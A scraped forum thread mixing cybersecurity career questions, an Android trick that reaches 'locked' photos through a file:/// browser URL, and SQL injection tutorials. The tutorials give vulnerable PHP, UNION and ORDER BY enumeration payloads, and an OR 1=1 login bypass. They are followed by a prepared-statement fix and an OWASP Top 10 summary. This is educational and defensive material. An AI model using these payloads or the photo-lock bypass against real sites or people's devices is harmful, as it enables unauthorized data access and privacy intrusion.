thanks for posting
-
-
Getting Started with AWS Machine Learning
-
I'm thinking of moving into cyber security after doing Cisco CCNA... Could people who know the cyber security field in Sri Lanka tell me what the job market in Sri Lanka is like? It would also be very valuable if you could give some idea of the exams and courses needed to get properly set up in cyber security, such as the differences between the courses offered by organizations like RedHat Linux, IBM and Microsoft. :heart_eyes: :heart_eyes: :heart_eyes:
-
Today, I brought you a trick that can be performed on any Android phone. I don't know whether this trick works on iOS as I didn't test it. But I am 100% sure this will work on Android. So, let's get started.
Why should you access locked photos on an Android phone?
There may be many reasons for that. If you can't remember the password or PIN used for locking the photo content, this trick will definitely help you. And, if you want to amaze or challenge your friend, this is a good trick to perform. And also, if you want to use parental control over your children, this trick will be very important.
What are the requirements to perform this trick?
You just need your Internet browser; no Internet connection is needed.
How to perform the trick?
Open your Internet browser. (Here, I am using Google Chrome.)
Type this URL in the search box.
file:///sdcard/DCIM/
Then, you will see a list of photo album folders. Select the one you need. Here, I select the 'Camera' folder.
Now, you will be able to see all the photos saved in the 'Camera' folder. So, click one of these photos and you will be able to preview it.
How to prevent others from performing this trick on your phone?
Others performing this trick on your phone can easily be avoided by locking your Internet browser.
Enjoy. And don't forget to express your ideas in the comment section about this article. Thank you!
-
These days, we see a lot of workshops, certifications, programmes, even degrees and higher qualification trends happening and since "hacking" sounds exciting or thrilling to most of the youth in our society, they'd naturally be curious and spend a lot of money or effort into this but sadly, very rarely do they know how to approach this correctly.
If you wanted to get into the Networking fields,
You could start off with CCNA, or take the ICND1 and ICND2 exams, after which you are CCNA qualified, whereas later on you can do CCNP and establish better ground on the aspect or focus on the various other qualifications out there.
When it comes to cybersecurity, however, despite needing a networking background and a more established knowledge in systems and operations, there's not much of a well refined career path known to most.
Some suggest starting off with CCNA, then with the Security module, then CEH, CHFI, etc.
I'd like to know from those in the Industry today about how they'd go about with this regard based on the knowledge they have now, and what you'd suggest for any reader here who'd come knocking by wanting to step foot in this path.
-
Hello all,
I hope you know how to do a SQL injection and have used it. In this tutorial we are going to see how it works: what's going on under the hood, and how a web application handles our input and processes the SQL query. Let's see.
Imagine that there is a web application like this.
Front-End Web Application
Here we see how the web application takes input from the user and sends that data to the PHP script through a GET request.

    <html>
    <head>
      <title>SQL Injection Tutorial - HacksLand</title>
    </head>
    <body>
      <h1><center>HacksLand - Ethical Hacking Tutorials</center></h1>
      <form method="GET" action="index.php">
        <h2><center>Give the ID for fetch details</center></h2><br>
        <input align="center" type="text" name="id">
      </form>
    </body>
    </html>

Back-end PHP Script
Now there should be a back-end script that handles this submitted data and makes a SQL query.
After the SQL query returns some data from the database, the PHP script processes that data and gives the user output.
Assume that the following is the PHP code.

    <?php
    include("sql_connect.php");   // provides the mysqli connection $con

    if (isset($_GET['id'])) {
        $id = $_GET['id'];
        // The user's input is placed directly into the SQL string
        $sql = "SELECT * FROM users WHERE id='$id' LIMIT 0,1";
        $result = mysqli_query($con, $sql);
        $row = mysqli_fetch_array($result, MYSQLI_BOTH);
        if ($row) {
            echo 'Name for ID: ' . $row['name'];
            echo "<br>";
            echo 'Age for ID: ' . $row['age'];
        } else {
            // The raw database error is printed to the page
            print_r(mysqli_error($con));
        }
    } else {
        echo "Please input the ID";
    }
    ?>

I hope you can understand what is going on here.
For this example we need a table that is used by the SQL query to take data from.
[Image: the example table]
So all OK and fine.
SQL Query
Now let's see how this is happening.
Imagine that I enter 3 as the input. So our ID will be equal to 3. What about our SQL query?

    $sql="SELECT * FROM users WHERE id='3' LIMIT 0,1";

So it will give us the output.
Name for ID: Clara
Age for ID : 18
Nice! It looks like the web application is working fine.
Do you remember that in our previous tutorial we used a single quote to break a SQL query?
What if I enter 3' as the input?
It gives me an error.

    You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near ''3'' LIMIT 0,1' at line 1

What the fuck is going on here?

    $sql="SELECT * FROM users WHERE id='3'' LIMIT 0,1";

You can clearly see that there is a syntax error near id='3''. Previously I explained why this happens.
Injecting SQL Query
Now we have to see how we can fix this error and extract data from the database. What if I enter the following payload?

    3' --+

Now our query is:

    $sql="SELECT * FROM users WHERE id='3' --+' LIMIT 0,1";

But actually we only care about the code before --+, because it's a comment character in SQL and everything after it will be ignored. So now this code is valid and it'll give us the output as expected.
This is the time to fetch data from the database. But how?
Can we use another SELECT command with this one?
Yes indeed. We can use two SELECT commands with the UNION operator like this.

    SELECT Name,Age FROM users UNION SELECT Subject,ID FROM users

But one thing: both SELECT queries must use a similar number of columns to fetch data. It doesn't matter that they use different columns; only the number of columns used should be the same.
You may say that it's simple, there are 5 columns in the table. No buddy, in real life you can't see the table and you can't figure out how many columns there are. 🙁
We can use a trick for finding the number of columns used by the first SELECT command.
Think about our table and the following commands.

    SELECT * FROM users ORDER BY Name
    SELECT * FROM users ORDER BY 3

The first command says select all columns from the users table, and the results should be ordered according to the Name column. The second command says the same, but the results should be ordered by the 3rd column (Age).
So even if we don't know the column names we can order by 1, 2, 3 etc. OK.
Now I enter this as the ID.

    3' order by 1--+

Let's see our query.

    $sql="SELECT * FROM users WHERE id= '3' order by 1--+' LIMIT 0,1";

This gives us the output as expected because there are more columns than 1. So it's possible to order the result according to the first column.
Next we try order by 2. This will also be fine. The web application will work normally until we say order by 5.
What if we enter order by 6?
Surely it'll give an error because there are not 6 columns. So by using this method we can find how many columns the first SELECT command is using. Now we can use another SELECT command.

    SELECT * FROM users WHERE id= '3' UNION SELECT 1,2,3,4,5 --+ ' LIMIT 0,1

What's going on here is that the SQL query thinks there is another table like the following, and the query tries to fetch data from both of them. After that, the data will be printed to the screen by the PHP code.
Now if we can print data from the second table we can find which columns are used by the web application to show data. (In this example we know that the PHP script gets the Name and Age columns.) But unfortunately we can still see only the following output. 🙁
Name for ID: Clara
Age for ID : 18
Why is that? Because when our SQL query sees there are two tables, it first tries to fetch data from the first table. So if we want to get data from the second one we must set a null value for the first SELECT command. Our final payload:

    SELECT * FROM users WHERE id= '-3' UNION SELECT 1,2,3,4,5 --+ ' LIMIT 0,1

Since -3 is not in the ID column, data from our second table will be printed out.
Name for ID: 2
Age for ID : 3
Finally it's a success. We can see columns 2 and 3 are used by the web app.
Now we can use these 2 channels to get any data from the database. 🙂
Extracting Basic Information
First of all let's try to find out the database name.

    SELECT * FROM users WHERE id= '-3' UNION SELECT 1,database(),3,4,5 --+ ' LIMIT 0,1

We can see the database name on the screen.
Name for ID: database_name

    SELECT * FROM users WHERE id= '-3' UNION SELECT 1,version(),3,4,5 --+ ' LIMIT 0,1

Age for ID : 3
Like this you can use database(), user(), version() etc. to fetch some basic data.
In the next tutorial we are going to learn how to use SQL injection to extract more data.
-
What is SQL Injection ?
SQL Injection is an attack against websites / web applications which use a SQL database.
Simply, a hacker will insert a malicious SQL command and take over the database.
How Does it Work?
Let's say you have code like this,

    <?php
    $username = $_POST['username'];
    $password = md5($_POST['password']);
    // Both values are placed directly into the SQL string
    $sql = "SELECT * FROM `users` WHERE username = '$username' AND password = '$password'";
    ?>

If the user inputs,
Username : admin
Password : admin123
The SQL will look like,

    SELECT * FROM `users` WHERE username = 'admin' AND password = '0192023A7BBD73250516F069DF18B500'

It will work fine.
But if the user inputs,
Username : admin' OR 1 = 1 --
Password : admin123
The SQL will look like,

    SELECT * FROM `users` WHERE username = 'admin' OR 1 = 1 --' AND password = '0192023A7BBD73250516F069DF18B500'

Here you can see that the password part of the query will be commented out (it will not execute).
And 1 = 1 is always true, so the hacker can get all the information of users. They can delete or change any record too.
How to prevent SQL Injections?
Nowadays, most back-end frameworks handle injections themselves. But if you don't use a framework, you can do it manually.
Every language has built-in functions to handle SQL injections while binding data.
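
Added example, not code from either post: the concatenated ID lookup from the first tutorial beside bound-parameter versions of that lookup and of the login query above. It assumes PDO with an in-memory SQLite database in place of MySQL so that it runs stand-alone; the table rows, the function names and the use of password_hash instead of md5 are this example's own choices.

```php
<?php
// Constructed in-memory data standing in for the posts' `users` table (SQLite replaces MySQL here).
$db = new PDO('sqlite::memory:');
$db->setAttribute(PDO::ATTR_ERRMODE, PDO::ERRMODE_EXCEPTION);
$db->exec("CREATE TABLE users (id INTEGER, name TEXT, age INTEGER, username TEXT, password TEXT)");
$ins = $db->prepare("INSERT INTO users VALUES (?, ?, ?, ?, ?)");
$ins->execute([1, 'Admin', 30, 'admin', password_hash('admin123', PASSWORD_DEFAULT)]);
$ins->execute([3, 'Clara', 18, 'clara', password_hash('constructed-pw', PASSWORD_DEFAULT)]);

// Pattern from the first post, kept only for comparison: input is pasted into the SQL text.
function lookup_concat(PDO $db, string $id): array {
    $row = $db->query("SELECT * FROM users WHERE id='$id' LIMIT 0,1")->fetch(PDO::FETCH_ASSOC);
    return $row ?: [];
}

// Hardened lookup: fixed SQL text, value bound separately, only the needed columns selected.
function lookup_bound(PDO $db, string $id): array {
    if (!ctype_digit($id)) {
        return [];                       // ids are unsigned integers; reject anything else
    }
    $stmt = $db->prepare("SELECT name, age FROM users WHERE id = ? LIMIT 0,1");
    $stmt->execute([(int) $id]);
    $row = $stmt->fetch(PDO::FETCH_ASSOC);
    return $row ?: [];
}

// Hardened login: bind the username, then verify the stored hash in PHP.
function login_bound(PDO $db, string $username, string $password): bool {
    $stmt = $db->prepare("SELECT password FROM users WHERE username = ?");
    $stmt->execute([$username]);
    $hash = $stmt->fetchColumn();
    return is_string($hash) && password_verify($password, $hash);
}

try {
    $payload = "-3' UNION SELECT 1,2,3,4,5 -- ";   // the first post's final input
    var_dump(lookup_concat($db, $payload));        // concatenated query: input changes the statement
    var_dump(lookup_bound($db, $payload));         // bound query: input is rejected as a non-integer
    var_dump(lookup_bound($db, "3"));              // a normal lookup still works
    var_dump(login_bound($db, "admin' OR 1 = 1 --", "admin123"));  // treated as a literal username
    var_dump(login_bound($db, "admin", "admin123"));
} catch (PDOException $e) {
    error_log($e->getMessage());   // log server-side rather than printing the database error to the user
}
```

With MySQL the same shape applies through PDO's MySQL driver or mysqli's prepare and bind_param.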
-
-
1. Injection
Injection flaws, such as SQL, NoSQL, OS, and LDAP injection, occur when untrusted data is sent to an interpreter as part of a command or query. The attacker's hostile data can trick the interpreter into executing unintended commands or accessing data without proper authorization.
2. Broken Authentication
Application functions related to authentication and session management are often implemented incorrectly, allowing attackers to compromise passwords, keys, or session tokens, or to exploit other implementation flaws to assume other users' identities temporarily or permanently.
3. Sensitive Data Exposure
Many web applications and APIs do not properly protect sensitive data, such as financial, healthcare, and PII. Attackers may steal or modify such weakly protected data to conduct credit card fraud, identity theft, or other crimes. Sensitive data may be compromised without extra protection, such as encryption at rest or in transit, and requires special precautions when exchanged with the browser.
4. XML External Entities (XXE)
Many older or poorly configured XML processors evaluate external entity references within XML documents. External entities can be used to disclose internal files using the file URI handler, internal file shares, internal port scanning, remote code execution, and denial of service attacks.
5. Broken Access Control
Restrictions on what authenticated users are allowed to do are often not properly enforced. Attackers can exploit these flaws to access unauthorized functionality and/or data, such as access other users' accounts, view sensitive files, modify other users' data, change access rights, etc.
6. Security Misconfiguration
Security misconfiguration is the most commonly seen issue. This is commonly a result of insecure default configurations, incomplete or ad hoc configurations, open cloud storage, misconfigured HTTP headers, and verbose error messages containing sensitive information. Not only must all operating systems, frameworks, libraries, and applications be securely configured, but they must be patched/upgraded in a timely fashion.
7. Cross-Site Scripting (XSS)
XSS flaws occur whenever an application includes untrusted data in a new web page without proper validation or escaping, or updates an existing web page with user-supplied data using a browser API that can create HTML or JavaScript. XSS allows attackers to execute scripts in the victim's browser which can hijack user sessions, deface web sites, or redirect the user to malicious sites.
8. Insecure Deserialization
Insecure deserialization often leads to remote code execution. Even if deserialization flaws do not result in remote code execution, they can be used to perform attacks, including replay attacks, injection attacks, and privilege escalation attacks.
9. Using Components with Known Vulnerabilities
Components, such as libraries, frameworks, and other software modules, run with the same privileges as the application. If a vulnerable component is exploited, such an attack can facilitate serious data loss or server takeover. Applications and APIs using components with known vulnerabilities may undermine application defenses and enable various attacks and impacts.
10. Insufficient Logging & Monitoring
Insufficient logging and monitoring, coupled with missing or ineffective integration with incident response, allows attackers to further attack systems, maintain persistence, pivot to more systems, and tamper, extract, or destroy data. Most breach studies show time to detect a breach is over 200 days, typically detected by external parties rather than internal processes or monitoring.
Ref - https://www.owasp.org/index.php/Top_10-2017_Top_10
I'll put up a post about injection attacks soon. :computer: :grin: :the_horns:
-